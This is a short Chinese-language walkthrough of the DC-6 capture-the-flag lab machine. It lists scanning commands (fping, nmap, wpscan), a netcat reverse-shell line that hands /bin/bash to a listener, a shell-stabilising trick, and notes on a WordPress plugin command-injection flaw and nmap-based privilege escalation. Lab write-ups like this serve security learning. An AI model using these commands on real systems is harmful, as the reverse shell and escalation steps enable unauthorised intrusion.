靶机DC-6的通关笔记

fping -aqg 192.168.1.1/24

nmap -sC -A -n -p- -Pn -T5 -oN DC-6 192.168.1.141

 

 

 

wpscan --url http://wordy/ -e -u

nc 192.168.1.131 1337 -e /bin/bash

https://gtfobins.github.io/

 

 

 

最后总结：

　　1.重定向的网站通过修改hosts文件解决

　　2.WordPress 后台中activity moniter中存在命令执行漏洞

　　3.优化终端的操作

　　　　　　Python -c 'import pty;pty.spawn("/bin/bash")'
　　　　　　Ctrl+z
　　　　　　stty raw -echo
　　　　　　fg
　　　　　　回车
　　　　　　回车
　　　　　　回车

　　4.nmap可以利用脚本提权

　　5.牛逼的网站 https://gtfobins.github.io/

　　6.我真菜